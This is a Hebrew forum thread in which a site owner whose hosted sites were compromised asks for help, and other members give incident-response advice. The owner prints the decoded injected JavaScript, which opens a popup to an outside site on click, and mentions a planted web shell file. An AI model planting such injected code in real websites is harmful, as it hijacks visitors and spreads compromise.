יש לי כמות נכבדת של אתרים שיושבים על שרת של חברת Funio (שייכת לiWeb) לפני יומיים שמתי שבכל פעם שאני נכנס לאתרים שלי קופץ לי חלון פופאפ שמוביל לאתר אחר http://www.allfromnet.net
האתרים שלי לא מקפיצים שום חלונות כך שידעתי שזה משהו בעייתי חיפשתי בין הקודים ומצאתי שמישהו שתל לי קוד בתוך חלק מקבצי הג׳אווה סקריפט של האתר
הקוד הוכנס בקודים של אסקי והתרגום שלו הוא
function CCK(name,value,days){var date,expires;if(days){date=new Date();date.setTime(date.getTime()+(days*24*60*60* 1000));expires=";expires="+date.toGMTString();}else{expires="";}document.cookie=name+"="+value+expires+";path=/";}function RCK(name){var i,c,ca,nameEQ=name+"=";ca=document.cookie.split(';');for(i=0;i<ca.length;i++){c=ca[i];while(c.charAt(0)==' '){c=c.substring(1,c.length);}if(c.indexOf(nameEQ) ==0){return c.substring(nameEQ.length,c.length);}}return '';}if(RCK("google-ads-5854412595")!=1){var xol=window.onload;window.onload=function(){if(type of xol=='function')xol();window.addEventListener("click",function(){CCK("google-ads-5854412595",1,1);window.open('http://www.allfromnet.net');window.location.reload();},tr ue);}}

בנוסף לכל הכאב ראש הזה
שמתי לב שהאתר שנפתח allfromnet.net
לא רק ששתל קוד אלא האתר שנפתח הוא אתר שגנב את הנתונים שלו מתוך הDb שלי
למרות שנראה שהוא לא מחובר אונליין

היום בבוקר מחקתי את כל הקודים ובערב ראיתי שכול הקודים חזרו שוב

מה אני יכול לעשות ?

לתקן את בעיות האבטחה בקוד של האתר שלך ו/או שבעל השרת שלך יתקן את בעיות האבטחה בשרת שלו ו/או ניקוי המחשב של בעל הגישה לכל האתרים מסוסים טרוייאניים ווירוסים, שבאמצעותם מישהו יכל להשיג את פרטי ההזדהות לשרת...

אחרי התיקון, למחוק את הכל, ולטעון את כל הנתונים חזרה (יש להניח שהם שובשו)

נמאס לכם לזכור סיסמאות? לחצו כאן!

איך מוצאים איפה הבעיית אבטחה?

אין נוסחת קסם שאני יכול להגיד לך 1,2,3.... צריך להסתכל על הדברים, צריך לראות מה השתנה ואיך, צריך לבדוק לוגים... צריך לעשות auditing על הקוד שלך אם מגיעים למסקנה שהבעייה לא הייתה בשרת... (שלא לדבר על זה שכיוון שהשרת לא שלך, תצטרך שיתוף פעולה של בעל השרת, שלא בטוח שתקבל...)

זה לא שאני יכול לתת לך פקודה שתגלה לך את התשובה... זה פשוט ידע שאתה צריך שיהיה לך, ידע שאוספים במשך שנים ובעצם אף פעם לא מפסיקים ללמוד...

יותר מזה - אם הבעייה הייתה מספיק חמורה והפורץ מספיק חכם - ייתכן שלא תמצא לעולם כיצד הוא נכנס. כמובן שבמקרה זה תרצה לעשות בדיקה על הקוד שלך כפי שהוא שמור אצלך (ולא בשרת, כי אולי הפורץ תיקן את הבאג שעל השרת כדי שאחרים לא יוכלו לפרוץ כמו שהוא פרץ - דבר די נפוץ) - ובשביל זה אתה צריך להבין באבטחת מידע (זה שקוד נחזה להיות פועל במקרים שאתה בדקת, לא אומר שאתה בדקת גם את המקרים הבעייתיים). ואולי הוא נכנס דרך אתרים אחרים שעל אותו שרת שבהם היה באג אבטחה...

לסיכום - לא פשוט, ולא ניתן לענות על הדבר הזה על רגל אחת.

נמאס לכם לזכור סיסמאות? לחצו כאן!

1. אם אני יעלה את הגירסאות הקודמות שיש לי האם זה יכול לעזור?
2. אתמול קיבלתי הודעה מהאחסון שהם מצאו shell access מאחד הקבצים שיש לי בשרת והם הסירו אותו
הבעיה היא שהקוד שוב חזר ככה שאני מניח שיש עוד מקום איפה שהוא בשרת שבו יש את אותה גישה או משהו אחר
3. האם החלפה של אחסון יכולה לעזור במקרה הזה?
4. האם אפשר לשכור את שרותייך בתשלום כמובן לנושא ? או לחילופין האם יש חברה מסויימת שאתה יכול להמליץ עליה ויכולה למצוא את הבעיה
5. אם האתרים היו מאוחסנים על שרת דדיקייטד האם הייתי יכול למצוא את הבעיה בצורה יותר קלה?
6. שאלה אחרונה ומצטער על האורך , האם יש דברים מסויימים או תוספות מסויימות שאני יכול לרכוש כדי להגן על האתרים שלי בשרתים שלי?

תודה

1. אם הבאג היה בקוד שלך, אז אא"כ בגירסאות הקודמות לא היה הבאג, והוא באג שנוצר בתוספת חדשה שיצרת לקוד, הגירסא הישנה לא תועיל בדבר. לכל היותר היא תפתח מחדש את פרצת האבטחה שאולי הפורץ תיקן ... כלומר תחמיר את המצב, מבחינתך

2. מן הסתם אם שום דבר לא שונה בסביבה, ומה שהיה פתוח לא נחסם (או נחסם על ידי הפורץ, אבל הוא דאג להשאיר דלת אחורית שרק הוא יכול להשתמש בה) - מחיקה של תוספת שהוא שם כדי לגשת בנוחות לשרת לא תשנה שום דבר (בדיוק כמו בסעיף 1) - הוא פשוט יחזור על מה שהוא עשה קודם..

3. אם הקוד שלך לא מאובטח, הוא יהיה לא מאובטח בכל חברת אירוח אתרים, שהרי הבעייה בקוד שלך. מצד שני, אם חברה מסויימת מריצה את כל האתרים בסביבות נפרדות, ויש לך שמות משתמשים נפרדים לכל סביבה, וסביבה א' לא יכולה לגעת בקבצים של סביבה ב', ואף אחד לא גילה את הסיסמאות שלך (למשל על ידי סוס טרוייאני על המחשב שלך), אזי באירוח שכזה, פריצה לאתר אחד, לא תשפיע על האתרים האחרים - כי הם נפרדים אחד מהשני לחלוטין...

4. אני שכיר, לא פרילאנסר, אז לא. לא מכיר חברות שעוסקות בזה מספיק כדי להמליץ. כן יכול להגיד לך שיש המון שרלטנים בתחום הזה... מי שחושב שלהתקין מוצר יקר ב 10000 דולר זה איזשהו קסם שפותר כל בעייה, הוא קשקשן. לדעתי האישית כמובן.

5. רק אם הייתה הפרדה מוחלטת בין האתרים כפי שנכתב בסעיף 3 בהודעה זו. כמובן שאין קשר לדדיקייטד, משום שאת מה שכתבתי ב 3 אפשר לעשות גם באירוח משותף. כמובן שבשרת פרטי משל עצמך, אתה יכול להקשיח אפילו יותר, כי אתה יכול לעשות דברים שמיוחדים עבורך, ואין לך את הצורך לתמוך ב"כל מה שכל לקוח יעלה לשרת". מצד שני, אתה צריך להבין במה שאתה עושה, כי אחרת אתה רק עלול להחמיר את רמת הפגיעות שלך...

6. לרכוש? לדעתי לא. אפשר לשים IPS בין האינטרנט לשרת, אבל זה יעזור רק במידה ומישהו מנסה לנצל משהו שיוצרי ה IPS חשבו עליו. לא משהו שלא. אין תחליף לכתיבת קוד מאובטח... זו הסיבה שגם לחברות ענק (כולל חברות אבטחה) עם משאבים פיננסיים שיכולים להחשב "בלתי מוגבלים" - עדיין פורצים. רק מהשבוע... http://thehackernews.com/2012/11/im...c-database.html

נמאס לכם לזכור סיסמאות? לחצו כאן!

לא יודע מה להגיד לך.

אני חושב שקוד לא מאובטח לא צריך לעלות לרשת, ובמקרה הגרוע ביותר, כותב קוד צריך לדעת למצוא מה לא מאובטח בקוד שלו במידה ובדיעבד התגלה שזה בכל זאת קרה.

האינטרנט הוא חופשי, וכל אחד יכול לעשות מה שהוא רוצה, אבל זה בדיוק העניין - כל אחד עושה מה שהוא רוצה. צריך להיות מסוגל להגן על עצמך. מי שאין לו את היכולת, צריך להשיג אותה לפני שהוא מתחיל לבנות אתרים דינאמיים. לצערי, לרוב זה לא קורה, ולכן אתרים נפרצים על ימין ועל שמאל...

נמאס לכם לזכור סיסמאות? לחצו כאן!

אם אתה רוצה בדיקת אבטחה לקוד האתר והאתר כתוב בPHP אני יכול להפנות אותך למומחה בענין. (אני לא בטוח שהוא יקח את העבודה, היות ואין לי מושג מה כמות העומס שיש לו כרגע, אבל אני יכול להפנות אותך) אם תרצה פרטים על הבחור תוכל לדבר איתי בפרטי.
בהצלחה בכל מקרה.

אתה יכול לנסות לעבור לשרת אחר?
והקוד של האתרים צריך להילקח ממקור שבו סביר להניח שהפורץ לא הגיע (כמו המחשב האישי של המפתח, או המחשב האישי שלך שכנראה שם נשמר הקוד של האתר).

בקיצור תנסה להקים את האתרים בשרת חדש, שהתוכנות בו עדכניות.
וכמובן תוודא שבשרת החדש יש הרשאות מתאימות לכל משתמש\"אתר"...

אני ינסה להעלות גרסאות קודמות לשרת דדיקייטד שיש לי או ממש להתחיל את הכל מחדש עם מקסימום הפרדות בין הדומיינים ומקסימום הגנה
אגב אם זה יכול לעזור לכם לתת לי כיוון כל הקודים מוכנסים תמיד לתוך קודי ג׳אווה סקריפט שנקראים מדף האינדקס

מצאתי קובץ בשם log.php שהתווסף לתיקייה tiny_mce
אצלי קובץ שלא היה שם קודם וכשניסיתי לשמור אותו על המחשב שלי ראיתי שהאנטיוירוס מזהה אותו כקובץ זדוני השאלה מה עכשיו
מחקתי את הקובץ אבל הוא עדיין מצליח להחזיר את הקוד גאווה סקריפט שלו
ניסיתי להעלות אותו לכאן אבל זה לא ממש עובד
ואני גם לא מצליח לשמור אותו על המחשב שלי בגלל שאנטיוירוס מוחק אותו מיד
כשעשיתי חיפוש באינטרנט ראיתי מישהו שהיה לו משהו דומה
הקובץ ששם דומה למה שיש אצלי רק שאצלי הוא הרבה הרבה יותר ארוך
http://www.surmunity.com/showthread.php/20369-Help!-webserver-being-hacked!
השאלה מה אפשר לעשות בנושא?

אתה לא מצאת את הקוד הבעייתי, מצאת אולי (חלק?) מהקוד שהוא דחף לך לאתר.

השאלה היא איך הוא דחף. קוד לא דוחף את עצמו באורח פלא, משהו איפשר לכתוב את הקובץ הזה בספריות הריצה של האתר שלך.

נמאס לכם לזכור סיסמאות? לחצו כאן!

והאם העובדה שהקובץ שם אומרת שהאתר שבו מצאתי את הקוד הוא האתר הבעייתי?

הכל יכול להיות. יכול להיות שיש לך יותר מבאג אחד. ואם כבר הלכו הלוגים, לעולם לא תדע איזה באג נוצל. לא שזה משנה, מטרתך היא 0 באגים... שדרוג מוצרי מדף לגירסא האחרונה זה בסיס מהבחינה הזו.

אני לא יודע איך בנוי השרת הזה, ואני לא יודע, אולי בכלל משתמש אחד יכול לשים קבצים אצל משתמש אחר בגלל בעיות אבטחה, ואז העובדה שמצאת את זה באתר מסויים לא אומר כלום (חוצמזה, אמרת שכל האתרים נפרצו, לא? אז מה הוכחנו פה?)

נמאס לכם לזכור סיסמאות? לחצו כאן!

ולדרוש ממנו שיבדוק את הקודים שייודא שהם מאובטחים וכו'
אם זה לא מכאן אז אני צריך להמשיך ולחפש את הבעיה
בנתיים מה שנאי מנסה לעשות זה כמו שאמרתי לעבור לשרת דדיקייטיד לפני שאני יתחיל להעלות לשם משהו לתת למומחה כלשהו להקשיח את ההגנה על השרת ואז הלעלות לשם קבצים מעודכנים כשאשר הרשאות יהיו כך שכל אתר יעמוד בעצם בפני עצמו ולא יתאפשר מעבר מאתר אחד לשני (לפחות זה מה שאני ינסה להשיג)
אני מנסה לבודד את הבעיה כדי שנאי יוכל לנסות למצוא את הדרך לתקן אותה
הרי ידיעת הבעיה היא חצי מהדרך לפיתרון
אם יש אילו שהם תובנות בנושא אני ישמח לדעת לפני שאני עושה מהלכים מרחיקי לכת
אגב
האם משהו בקובץ הסיוטי הזה יכול לתת רמז איפה עוד שתול קוד בעייתי ?
נקודה נוספת היא שאם באמת הבעיה נבעה מזה שהtiny_mce לא היה מעודכן אז אני יעדכן אותו בגיבוי ישן שיש לי לפני שכל הסיוט התחיל ויעלה חזרה

להפריד הרשאות בין אתרים זה לא מהלך מרחיק לכת, זה בסיס של בסיס. מארח אתרים שלא עושה את זה, אסור לעשות איתו עסקים.

ההפרדה תאפשר לך לדעת אם רק אחד מהאתרים יפרץ בהמשך. אבל אם יש משהו משותף לכולם שבו הבעייה, מן הסתם שזה לא יעזור.

הקובץ הזה הוא סתם שטות שמישהו הוריד מהאינטרנט ולכן אני בספק שיש טעם לנתח אותו...

שוב אני אומר - תעלה עותק מקורי של האתר מגיבוי שלך, ואז סילקת את כל התוספות. כמובן שבאגי האבטחה עדיין יצטרכו להיות מתוקנים. (אל תגיד לי שאין לך גיבוי משל עצמך על המחשב שלך לדברים שאתה עושה... ? במקרה זה, באמת שקשה לי לחשוב איך אתה פותר את זה...)

נמאס לכם לזכור סיסמאות? לחצו כאן!

לגבי ההפרדה כאחד שלא ממש במין בנושא לצערי הרבה לא ידעתי ועכשיו למדתי את זה על בשרי
כמו שציינתי השרת שעליו ישבו השרתים היה שרת שיתופי
יש לי שרת דדיקייטיד שלא ממש מנוצל כמו שצריך אני יעביר אליו את האתרים וינסה להקשיח על כמה שאפשר את השרת ולמצוא את הבעיה

זה שהוא שיתופי זה לא שייך. יש שרתים שיתופיים שמפרידים בין האתרים שלהם...

נמאס לכם לזכור סיסמאות? לחצו כאן!

משהו אני משתדל או ללמוד (כקגע אין לי יכולת בפאת הדחיפות וזמן) ואו לשלם למישהו שמבין בזה יותר ממני
במקרה הזה אני כנראה יילך על החלק השני וינסה ללמוד עד כמה שרק אוכל
תודה על כל העזרה עד עכשיו
עזרת לי המון!!!